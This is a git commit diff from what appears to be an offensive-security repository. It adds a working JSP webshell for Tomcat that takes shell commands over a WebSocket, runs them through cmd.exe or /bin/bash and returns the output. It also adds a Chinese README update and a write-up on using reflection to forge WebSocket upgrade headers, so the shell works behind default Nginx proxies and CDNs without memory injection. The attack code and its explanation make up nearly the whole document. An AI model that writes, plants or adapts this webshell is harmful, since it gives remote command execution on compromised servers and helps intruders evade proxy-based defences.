Bypass Nginx CDN, jsp webshell

veo · veo · commit 5cc110008b05 · 2022-08-18T18:12:42.000+08:00
diff --git a/.DS_Store b/.DS_Store
diff --git a/BypassNginxCDN/wsNotAddEndpoint.jsp b/BypassNginxCDN/wsNotAddEndpoint.jsp
@@ -0,0 +1,74 @@
+<%@ page import="java.util.*" %>
+<%@ page import="java.io.InputStream" %>
+<%@ page import="java.lang.reflect.Field" %>
+<%@ page import="javax.websocket.Endpoint" %>
+<%@ page import="javax.websocket.Session" %>
+<%@ page import="javax.websocket.EndpointConfig" %>
+<%@ page import="javax.websocket.MessageHandler" %>
+<%@ page import="javax.websocket.server.ServerContainer" %>
+<%@ page import="javax.websocket.server.ServerEndpointConfig" %>
+<%@ page import="org.apache.tomcat.websocket.server.WsServerContainer" %>
+<%@ page import="org.apache.tomcat.websocket.server.UpgradeUtil" %>
+<%@ page import="org.apache.tomcat.util.http.MimeHeaders" %>
+
+<%!
+    public static class CmdEndpoint extends Endpoint implements MessageHandler.Whole<String> {
+        private Session session;
+        @Override
+        public void onMessage(String s) {
+            try {
+                Process process;
+                boolean bool = System.getProperty("os.name").toLowerCase().startsWith("windows");
+                if (bool) {
+                    process = Runtime.getRuntime().exec(new String[] { "cmd.exe", "/c", s });
+                } else {
+                    process = Runtime.getRuntime().exec(new String[] { "/bin/bash", "-c", s });
+                }
+                InputStream inputStream = process.getInputStream();
+                StringBuilder stringBuilder = new StringBuilder();
+                int i;
+                while ((i = inputStream.read()) != -1)
+                    stringBuilder.append((char)i);
+                inputStream.close();
+                process.waitFor();
+                session.getBasicRemote().sendText(stringBuilder.toString());
+            } catch (Exception exception) {
+                exception.printStackTrace();
+            }
+        }
+        @Override
+        public void onOpen(final Session session, EndpointConfig config) {
+            this.session = session;
+            session.addMessageHandler(this);
+        }
+    }
+    private void SetHeader(HttpServletRequest request, String key, String value){
+        Class<? extends HttpServletRequest> requestClass = request.getClass();
+        try {
+            Field requestField = requestClass.getDeclaredField("request");
+            requestField.setAccessible(true);
+            Object requestObj = requestField.get(request);
+            Field coyoteRequestField = requestObj.getClass().getDeclaredField("coyoteRequest");
+            coyoteRequestField.setAccessible(true);
+            Object coyoteRequestObj = coyoteRequestField.get(requestObj);
+            Field headersField = coyoteRequestObj.getClass().getDeclaredField("headers");
+            headersField.setAccessible(true);
+            MimeHeaders headersObj = (MimeHeaders)headersField.get(coyoteRequestObj);
+            headersObj.removeHeader(key);
+            headersObj.addValue(key).setString(value);
+        } catch (Exception e) {
+            e.printStackTrace();
+        }
+    }
+%>
+
+<%
+    ServletContext servletContext = request.getSession().getServletContext();
+    ServerEndpointConfig configEndpoint = ServerEndpointConfig.Builder.create(CmdEndpoint.class, "/x").build();
+    WsServerContainer container = (WsServerContainer) servletContext.getAttribute(ServerContainer.class.getName());
+    Map<String, String> pathParams = Collections.emptyMap();
+    SetHeader(request,"Connection","upgrade");
+    SetHeader(request,"Sec-WebSocket-Version","13");
+    SetHeader(request,"Upgrade","websocket");
+    UpgradeUtil.doUpgrade(container, request, response, configEndpoint, pathParams);
+%>
diff --git a/README.md b/README.md
@@ -1,4 +1,4 @@
-# **WebSocket 内存马，一种新型内存马技术**
+# **WebSocket Webshell，一种新型WebShell技术**
 
 ## 兼容性测试
 
@@ -14,15 +14,21 @@ Jboss(WildFly)
 
 #### （3）无法使用的场景
 
-1.使用了Nginx等代理，未配置Header转发 支持WebSocket
+~~1.使用了Nginx等代理，未配置Header转发 支持WebSocket~~ 已支持
+
+~~2.使用了CDN，CDN供应商未支持WebSocket服务~~ 已支持
+
+#### （4）~~必须注入内存~~
+
+已支持不注入内存，非必须
 
-2.使用了CDN，CDN供应商未支持WebSocket服务
 
 ## 详细介绍
 
 - ### [websocket 内存马介绍](/static/websocket1.md)
 - ### [websocket 内存马代理](/static/websocketproxy.md)
 - ### [websocket 多功能shell实现](/static/websocket2.md)
+- ### [无需注入，可以绕过Nginx、CDN代理限制的 WebSocket jsp马](/static/wsNotAddEndpoint.md)
 
 ## 版权声明
 
diff --git a/static/wsNotAddEndpoint.md b/static/wsNotAddEndpoint.md
@@ -0,0 +1,60 @@
+# 无需注入，可以绕过Nginx、CDN代理限制的 WebSocket jsp马
+
+    之前提到过可以向 WsServerContainer 容器内 添加ServerEndpointConfig 来注册WebSocket内存马，这样即有好处也有弊端，好处是内存马无落地文件，不好的地方是容易受限制无法使用。于是，我最近改写了下脚本的内容，直接取jsp内的request进行协议升级，从而不需要进行注册路径等操作，增加了HttpServletRequest的Header，使其可以在Nginx代理默认配置下使用
+
+Nginx默认代理配置本身是不支持WebSocket协议的，需要修改 /etc/nginx/conf.d/nginx.conf，增加 proxy_set_header 内容，网上也可以搜到许多资料，其实就是增加了两个文件头，并未做其他处理。
+
+那其实我们完全可以在Server端拦截request自己添加文件头来支持WebSocket
+
+```java
+    private void SetHeader(HttpServletRequest request, String key, String value){
+        Class<? extends HttpServletRequest> requestClass = request.getClass();
+        try {
+            Field requestField = requestClass.getDeclaredField("request");
+            requestField.setAccessible(true);
+            Object requestObj = requestField.get(request);
+            Field coyoteRequestField = requestObj.getClass().getDeclaredField("coyoteRequest");
+            coyoteRequestField.setAccessible(true);
+            Object coyoteRequestObj = coyoteRequestField.get(requestObj);
+            Field headersField = coyoteRequestObj.getClass().getDeclaredField("headers");
+            headersField.setAccessible(true);
+            MimeHeaders headersObj = (MimeHeaders)headersField.get(coyoteRequestObj);
+            headersObj.removeHeader(key);
+            headersObj.addValue(key).setString(value);
+        } catch (Exception e) {
+            e.printStackTrace();
+        }
+    }
+
+    SetHeader(request,"Connection","upgrade");
+    SetHeader(request,"Sec-WebSocket-Version","13");
+    SetHeader(request,"Upgrade","websocket");
+```
+
+通过添加这三个文件头，Tomcat就可以通过后续的doUpgrade校验了
+
+```java
+if (!headerContainsToken(req, Constants.CONNECTION_HEADER_NAME,
+        Constants.CONNECTION_HEADER_VALUE)) {
+    resp.sendError(HttpServletResponse.SC_BAD_REQUEST);
+    return;
+}
+if (!headerContainsToken(req, Constants.WS_VERSION_HEADER_NAME,
+        Constants.WS_VERSION_HEADER_VALUE)) {
+    resp.setStatus(426);
+    resp.setHeader(Constants.WS_VERSION_HEADER_NAME,
+            Constants.WS_VERSION_HEADER_VALUE);
+    return;
+}
+key = req.getHeader(Constants.WS_KEY_HEADER_NAME);
+if (key == null) {
+    resp.sendError(HttpServletResponse.SC_BAD_REQUEST);
+    return;
+}
+```
+
+Tomcat 是通过org.apache.tomcat.websocket.server.UpgradeUtil.doUpgrade 来把http协议升级为WebSocket
+
+那把需要的内容传入进去，即可完成jsp文件连接WebSocket的功能
+
+UpgradeUtil.doUpgrade(container, request, response, configEndpoint, pathParams);
